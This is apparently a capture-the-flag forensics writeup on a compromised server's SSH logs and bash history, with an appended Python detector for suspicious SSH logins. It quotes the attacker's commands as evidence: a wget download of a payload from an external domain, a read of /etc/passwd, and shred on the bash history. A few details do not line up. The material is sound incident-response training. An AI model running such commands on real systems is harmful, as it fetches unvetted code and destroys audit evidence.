hackthebox
This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.
The investigation centered on a compromised development server that was accessed from an unusual external IP address during non-business hours, followed by typical post-exploitation activities including system reconnaissance, payload delivery, and evidence destruction.
The primary evidence files were SSH authentication logs (auth.log) and bash command history (.bash_history). Initial examination of the SSH logs revealed a successful login from an unexpected external source:
Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2
Key findings from log analysis:
- 2.67.182.119 (external, non-corporate address)
- 100.107.36.130:2221 (non-standard port)
- 2024-02-19 04:00:14 (4 AM, outside work hours)
- OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4

Examining the user's bash history revealed a clear sequence of post-exploitation activities:

```bash
whoami                                  # Confirm user context
uname -a                                # System reconnaissance
cat /etc/passwd                         # User enumeration
wget http://gnu-packages.com/setup.sh   # Payload download from suspicious domain
shred -u ~/.bash_history                # Evidence destruction
./setup                                 # Execute malware
```
The commands demonstrate a classic attack lifecycle:
- User enumeration via /etc/passwd
- Payload download from gnu-packages.com
- shred to destroy bash history evidence
- Execution of ./setup

Several red flags were identified:
...
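The auth.log check that surfaced the 04:00:14 login can be made repeatable. The following is an added example, not code from the writeup: it parses sshd "Accepted" lines and flags successful logins that come from outside an assumed corporate address range or outside assumed working hours. The corporate ranges, the working-hours window and the year (syslog lines carry none) are assumptions; the sample log is constructed around the single line quoted above.

```python
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed sample: the 04:00:14 line is the one quoted in the writeup,
# the other lines are made up to show what ordinary logins look like.
AUTH_LOG = """\
Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2
Feb 19 09:15:02 server sshd[12350]: Accepted publickey for devuser from 10.0.5.23 port 51022 ssh2
Feb 19 10:42:51 server sshd[12377]: Failed password for invalid user admin from 2.67.182.119 port 40011 ssh2
Feb 19 18:30:45 server sshd[12401]: Accepted password for alice from 10.0.5.40 port 52100 ssh2
"""

# Assumptions not stated on the page: corporate address space, working hours, log year.
CORPORATE_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
WORK_HOURS = range(8, 19)   # 08:00 through 18:59
YEAR = 2024                 # syslog timestamps omit the year; the writeup dates the incident to 2024

ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

def parse_accepted(line):
    """Return a dict for an sshd 'Accepted ...' line, or None for any other line."""
    m = ACCEPTED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"time": ts, "user": m["user"], "method": m["method"],
            "ip": ip_address(m["ip"]), "port": int(m["port"])}

def suspicious_logins(log_text):
    """Flag successful logins from non-corporate addresses or outside work hours."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_accepted(line)
        if rec is None:
            continue                      # failed attempts and other noise are skipped here
        reasons = []
        if not any(rec["ip"] in net for net in CORPORATE_NETS):
            reasons.append("external source address")
        if rec["time"].hour not in WORK_HOURS:
            reasons.append("outside work hours")
        if reasons:
            hits.append((rec["time"].isoformat(), rec["user"], str(rec["ip"]), reasons))
    return hits

if __name__ == "__main__":
    for hit in suspicious_logins(AUTH_LOG):
        print(*hit)
```

Only the devuser login from 2.67.182.119 is flagged, on both counts; the two in-hours logins from the 10.0.0.0/8 range pass, and the failed attempt is ignored by design.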